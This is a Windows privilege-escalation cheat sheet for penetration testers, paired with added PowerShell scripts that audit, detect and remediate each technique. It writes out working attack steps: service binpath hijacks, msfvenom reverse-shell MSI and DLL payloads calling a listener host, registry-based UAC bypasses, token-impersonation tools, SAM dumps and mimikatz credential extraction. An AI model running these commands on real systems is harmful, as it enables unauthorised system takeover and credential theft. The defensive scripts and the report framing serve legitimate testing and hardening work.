
Privilege Escalation Windows

Privilege escalation on Windows systems

snippet · advanced · 2025-05-10 · 2 min read
Tags: privesc, windows, uac, token, alwaysinstallelevated

Automated enumeration

```powershell
# WinPEAS
.\winPEASx64.exe
# PowerUp (PowerSploit)
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt
.\Seatbelt.exe -group=all
```

System information

```bash
systeminfo
whoami /all
net user
net localgroup administrators
```

Vulnerable services

```bash
# Variables: {{SERVICE_NAME}}, {{USER}}
# Modifiable services
sc qc {{SERVICE_NAME}}
accesschk.exe -uwcqv "Authenticated Users" *
# Change the binary path (note the space after "binpath=")
sc config {{SERVICE_NAME}} binpath= "cmd.exe /c net localgroup administrators {{USER}} /add"
sc stop {{SERVICE_NAME}}
sc start {{SERVICE_NAME}}
# Unquoted service path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
```
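An added audit script, not part of this snippet, for the condition the wmic one-liner above hunts for: it lists services whose unquoted image path contains a space, shows the intermediate paths Windows would resolve first (C:\Program.exe and so on) together with whether their directory is broadly writable, and quotes the path in the registry when run with -Fix. Function names are my own; it assumes an elevated PowerShell 5.1 or later session on the audited host.

```powershell
# Added audit example, not part of the original snippet. Read-only unless
# -Fix is given; run from an elevated PowerShell on the host being audited.
param([switch]$Fix)

function Get-UnquotedServicePath {
    # One object per service whose executable path is not quoted but contains
    # a space before the ".exe" extension.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $pathName = $_.PathName
        if (-not $pathName -or $pathName.StartsWith('"')) { return }
        $exeEnd = $pathName.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        $image  = if ($exeEnd -ge 0) { $pathName.Substring(0, $exeEnd + 4) } else { $pathName }
        if ($image -notmatch ' ') { return }
        [pscustomobject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            StartName = $_.StartName
            ImagePath = $image
            PathName  = $pathName
        }
    }
}

function Get-HijackCandidate {
    # For "C:\Program Files\My App\svc.exe", CreateProcess tries
    # "C:\Program.exe", then "C:\Program Files\My.exe", and so on. Report each
    # candidate and whether its parent directory grants write access to a
    # broad group (string match on the ACL: good enough for triage, numeric
    # generic-rights entries are not decoded here).
    param([string]$ImagePath)
    $parts = $ImagePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidate = (($parts[0..($i - 1)]) -join ' ') + '.exe'
        $dir = Split-Path -Path $candidate -Parent
        $writable = $false
        if (Test-Path -LiteralPath $dir) {
            $writable = [bool]((Get-Acl -LiteralPath $dir).Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $_.IdentityReference -match 'Everyone|Authenticated Users|BUILTIN\\Users' -and
                $_.FileSystemRights -match 'Write|Modify|FullControl'
            })
        }
        [pscustomobject]@{ Candidate = $candidate; Directory = $dir; BroadWrite = $writable }
    }
}

function Repair-UnquotedServicePath {
    # Mitigation: wrap the executable part in quotes and keep any arguments.
    # Writing ImagePath directly avoids the sc.exe "binPath= " quoting pitfalls.
    param([string]$Name, [string]$PathName, [string]$ImagePath)
    $arguments = $PathName.Substring($ImagePath.Length)
    $quoted = '"' + $ImagePath + '"' + $arguments
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Name" -Name ImagePath -Value $quoted
    Write-Host "  fixed: $quoted"
}

foreach ($svc in Get-UnquotedServicePath) {
    Write-Host "[$($svc.Name)] $($svc.PathName)  (account: $($svc.StartName), start: $($svc.StartMode))"
    Get-HijackCandidate -ImagePath $svc.ImagePath | ForEach-Object {
        $flag = if ($_.BroadWrite) { 'WRITABLE' } else { 'ok' }
        Write-Host "  $($_.Candidate)  [$flag]"
    }
    if ($Fix) {
        Repair-UnquotedServicePath -Name $svc.Name -PathName $svc.PathName -ImagePath $svc.ImagePath
    }
}
```

A finding only matters when one of the candidate directories is writable by a low-privilege group and the service runs as a privileged account with an automatic start; the ACL match is deliberately loose, so confirm any WRITABLE hit with accesschk or icacls before reporting it.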

AlwaysInstallElevated

```bash
# Variables: {{LHOST}}, {{LPORT}}
# Check the registry keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both are 1, generate a malicious MSI:
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f msi -o shell.msi
# Run on the target:
msiexec /quiet /qn /i C:\Temp\shell.msi
```
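An added check, not part of this snippet, that reads the two values the reg query lines above target, tells you whether the policy is effectively on (both must be 1), sets both to 0 with -Remediate, and lists recent MsiInstaller events so an analyst can see what was installed while it was enabled. Function names are my own; it assumes PowerShell 5.1 or later and, for remediation and the Application log, an elevated session.

```powershell
# Added check, not part of the original snippet.
param([switch]$Remediate, [int]$Days = 7)

$policyKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # One object per hive; Value is $null when the value or key is absent.
    foreach ($key in $policyKeys) {
        $item  = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $value = if ($item) { [int]$item.AlwaysInstallElevated } else { $null }
        [pscustomobject]@{ Key = $key; Value = $value }
    }
}

function Test-AlwaysInstallElevated {
    # The policy only takes effect when both the machine and the user value are 1.
    $states  = @(Get-AlwaysInstallElevatedState)
    $enabled = (@($states | Where-Object { $_.Value -eq 1 }).Count -eq 2)
    foreach ($s in $states) {
        $shown = if ($null -eq $s.Value) { 'not set' } else { $s.Value }
        Write-Host "$($s.Key) -> $shown"
    }
    return $enabled
}

function Disable-AlwaysInstallElevated {
    # Mitigation: explicit 0 in both hives, the same result as setting the GPO
    # "Always install with elevated privileges" to Disabled.
    foreach ($key in $policyKeys) {
        if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

function Get-RecentMsiInstall {
    # Application log, provider MsiInstaller: 1033 = product installed,
    # 1040/1042 = installer transaction begin/end. Get-WinEvent throws when
    # nothing matches, hence SilentlyContinue.
    param([int]$Days)
    Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MsiInstaller'
        Id           = 1033, 1040, 1042
        StartTime    = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Message'; e = { ($_.Message -split "`r?`n")[0] } }
}

if (Test-AlwaysInstallElevated) {
    Write-Host 'AlwaysInstallElevated is ENABLED: any user can install an MSI as SYSTEM.'
    if ($Remediate) { Disable-AlwaysInstallElevated; Write-Host 'Both values set to 0.' }
} else {
    Write-Host 'AlwaysInstallElevated is not effectively enabled.'
}
Get-RecentMsiInstall -Days $Days | Format-Table -AutoSize
```

The HKCU value is per user, so a clean result in one session does not clear the host: check it for every profile that logs on, or enforce the Disabled state through Group Policy so the machine value wins.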

Token Impersonation

```bash
# Variables: {{LPORT}}
# In meterpreter:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
# PrintSpoofer (SeImpersonatePrivilege)
PrintSpoofer64.exe -i -c cmd
# Juicy Potato (Windows < 2019); -c takes a CLSID in braces, which depends on the Windows version
JuicyPotato.exe -l {{LPORT}} -p cmd.exe -t * -c {CLSID}
# GodPotato
GodPotato-NET4.exe -cmd "cmd /c whoami"
```

UAC Bypass

```powershell
# Fodhelper bypass
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
# Eventvwr bypass
$cmd = "cmd /c start cmd.exe"
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" "(default)" $cmd
Start-Process "eventvwr.exe"
```
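An added detection and cleanup script, not part of this snippet. Both bypasses above work by planting a command under the user's HKCU\Software\Classes, where a normal profile never carries these classes. This walks every loaded hive under HKEY_USERS, reports any planted key with its command, and removes the whole class key with -Clean. Function names are my own; it assumes an elevated PowerShell 5.1 or later session so all loaded hives are readable.

```powershell
# Added detection/cleanup example, not part of the original snippet.
param([switch]$Clean)

# Relative key -> the auto-elevating binary that consults it
$hijackKeys = @{
    'Software\Classes\ms-settings\Shell\Open\command' = 'fodhelper.exe'
    'Software\Classes\mscfile\shell\open\command'     = 'eventvwr.exe'
}

function Get-UacHijackKey {
    # Look in every loaded user hive, not only the current user's HKCU.
    Get-ChildItem -Path 'Registry::HKEY_USERS' | ForEach-Object {
        $sid = $_.PSChildName
        if ($sid -like '*_Classes') { return }
        foreach ($relative in $hijackKeys.Keys) {
            $full = "Registry::HKEY_USERS\$sid\$relative"
            if (-not (Test-Path -Path $full)) { continue }
            $props = Get-ItemProperty -Path $full
            [pscustomobject]@{
                Sid             = $sid
                Target          = $hijackKeys[$relative]
                Key             = $full
                Command         = $props.'(default)'
                DelegateExecute = $(if ($null -ne $props.DelegateExecute) { 'present' } else { 'absent' })
            }
        }
    }
}

function Remove-UacHijackKey {
    # Remove the planted class key as a whole (ms-settings or mscfile) rather
    # than only the command value, so no empty shell-verb skeleton is left.
    param([string]$Sid, [string]$Relative)
    $classRelative = (($Relative -split '\\')[0..2]) -join '\'   # e.g. Software\Classes\ms-settings
    $classKey = "Registry::HKEY_USERS\$Sid\$classRelative"
    Remove-Item -Path $classKey -Recurse -Force
    Write-Host "  removed $classKey"
}

$findings = @(Get-UacHijackKey)
if ($findings.Count -eq 0) { Write-Host 'No planted UAC-bypass class keys found.' }
foreach ($f in $findings) {
    Write-Host "[$($f.Sid)] $($f.Target)"
    Write-Host "  key: $($f.Key)"
    Write-Host "  command: $($f.Command)  (DelegateExecute $($f.DelegateExecute))"
    if ($Clean) {
        $relative = $f.Key -replace '^Registry::HKEY_USERS\\[^\\]+\\', ''
        Remove-UacHijackKey -Sid $f.Sid -Relative $relative
    }
}
```

For continuous detection rather than a point-in-time sweep, Sysmon Event ID 13 (registry value set) with a TargetObject ending in ms-settings\Shell\Open\command or mscfile\shell\open\command catches the write at the moment it happens, before fodhelper.exe or eventvwr.exe is ever launched.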

DLL Hijacking

```bash
# Variables: {{LHOST}}, {{LPORT}}, {{APP}}
# Find missing DLLs
procmon.exe # filter on "NAME NOT FOUND" + ".dll"
# Generate a malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f dll -o hijack.dll
# Copy into the writable directory
copy hijack.dll "C:\Program Files\{{APP}}\missing.dll"
```

Stored credentials

```bash
# Variables: {{DOMAIN}}, {{USER}}
# Windows Credential Manager
cmdkey /list
# Use the stored creds
runas /savecred /user:{{DOMAIN}}\{{USER}} cmd.exe
# SAM dump (if SYSTEM)
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
# Attacker side:
python3 impacket/secretsdump.py -sam SAM -system SYSTEM LOCAL
# LSASS dump
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# Task Scheduler creds (findstr has no "|" alternation; use one /c: per string)
schtasks /query /fo LIST /v | findstr /i /c:"task" /c:"run as"
```
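An added mitigation check, not part of this snippet. The LSASS and Credential Manager techniques above depend on a few host settings; this reads them and states which ones still leave credentials exposed. Function names are my own; it assumes PowerShell 5.1 or later on Windows 10/Server 2016 or newer, run elevated for the HKLM and Device Guard queries.

```powershell
# Added mitigation check, not part of the original snippet.
function Get-RegistryValueOrNull {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($item) { $item.$Name } else { $null }
}

function Get-CredentialExposureState {
    # RunAsPPL = 1 runs LSASS as a protected process, which blocks the handle
    # sekurlsa::logonpasswords needs unless a signed driver is brought along.
    $runAsPpl = Get-RegistryValueOrNull 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL'
    # WDigest UseLogonCredential = 1 makes LSASS keep plaintext passwords in
    # memory; absent or 0 on Windows 8.1/2012 R2 and later means they are not kept.
    $wdigest = Get-RegistryValueOrNull 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    # Credential Guard reports through Win32_DeviceGuard: SecurityServicesRunning contains 1 when it is on.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)
    # Saved entries usable with runas /savecred show up as "Target:" lines in cmdkey /list.
    $savedCreds = @(cmdkey /list | Where-Object { $_ -match '^\s*Target:' }).Count

    [pscustomobject]@{
        LsaProtection        = ($runAsPpl -eq 1)
        WDigestPlaintext     = ($wdigest -eq 1)
        CredentialGuard      = $credGuard
        SavedCredentialCount = $savedCreds
    }
}

$state = Get-CredentialExposureState
$state | Format-List
if (-not $state.LsaProtection) {
    Write-Host 'Mitigation: set HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1 (DWORD) and reboot.'
}
if ($state.WDigestPlaintext) {
    Write-Host 'Mitigation: set ...\SecurityProviders\WDigest\UseLogonCredential = 0 and have users log off and on again.'
}
if ($state.SavedCredentialCount -gt 0) {
    Write-Host "$($state.SavedCredentialCount) saved credential(s): review with cmdkey /list, remove with cmdkey /delete:<target>."
}
```

None of these settings stops the SAM/SYSTEM hive export, which only needs SYSTEM: that step is covered by LAPS-style unique local administrator passwords, so a dumped local hash is worth one machine rather than the fleet.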

Passwords in files

```bash
findstr /si password *.xml *.ini *.txt *.config 2>nul
dir /s /b *pass* *cred* *vnc* *.config 2>nul
```

⚠ Warning

Privilege escalation techniques leave traces in the Windows event logs. Document every step for the report.
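An added example from the defender's side, not part of this snippet: it pulls the event-log entries the techniques on this page typically leave, so each step in the report can be tied to its trace. Function names are my own; it assumes an elevated PowerShell 5.1 or later session. Security 4688/4697/4698 exist only when the matching audit subcategories are enabled, and 4688 carries the command line only when "Include command line in process creation events" is on.

```powershell
# Added example, not part of the original snippet: what the blue team sees.
param([int]$Hours = 24)

function Get-PrivescTrace {
    param([datetime]$Since)
    $queries = @(
        @{ LogName = 'System';   Id = 7045; Why = 'new service installed' },
        @{ LogName = 'Security'; Id = 4697; Why = 'service installed (audit)' },
        @{ LogName = 'Security'; Id = 4698; Why = 'scheduled task created' },
        @{ LogName = 'Security'; Id = 4688; Why = 'process creation'
           Match = 'fodhelper\.exe|eventvwr\.exe|msiexec\.exe|sc\.exe|mimikatz' }
    )
    foreach ($q in $queries) {
        # Get-WinEvent throws when nothing matches, hence SilentlyContinue.
        $events = Get-WinEvent -FilterHashtable @{ LogName = $q.LogName; Id = $q.Id; StartTime = $Since } `
                               -ErrorAction SilentlyContinue
        foreach ($e in $events) {
            if ($q.Match -and $e.Message -notmatch $q.Match) { continue }
            # Prefer the line naming the service, task or process over the generic first line.
            $lines   = $e.Message -split "`r?`n"
            $summary = $lines | Where-Object { $_ -match 'Service Name|New Process Name|Task Name' } | Select-Object -First 1
            if (-not $summary) { $summary = $lines[0] }
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Log     = $q.LogName
                Id      = $q.Id
                Why     = $q.Why
                Summary = $summary.Trim()
            }
        }
    }
}

Get-PrivescTrace -Since (Get-Date).AddHours(-$Hours) | Sort-Object Time | Format-Table -AutoSize
```

The AlwaysInstallElevated path additionally shows up as MsiInstaller events in the Application log, and the UAC-bypass registry writes as Sysmon Event ID 13 where Sysmon is deployed; the 4688 filter here is a starting list, extend the regex with the tool names actually used during the engagement.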
